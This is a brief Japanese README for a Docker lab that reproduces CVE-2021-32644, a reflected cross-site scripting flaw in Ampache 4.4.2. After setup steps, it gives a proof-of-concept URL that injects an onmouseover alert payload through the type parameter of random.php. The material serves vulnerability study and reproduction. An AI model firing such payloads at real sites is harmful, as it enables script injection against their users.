
Ampache XSS
この脆弱性はAmpache 4.4.3より前のバージョンに影響を与えたXSS脆弱性です。 https://nvd.nist.gov/vuln/detail/CVE-2021-32644
インストールを進める際は、docker-compose.ymlファイルでポートフォワーディングを行ってください。現在インストールするAmpacheのバージョンは4.4.2です。
$docker-compose up
http://[web-server ip]:port/に移動します。
http://[web-server ip]:port/に移動します。
下の画像のようにmysql DBを設定します。

以下のPoCを挿入すると、XSS脆弱性が発生することが確認できます。
http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html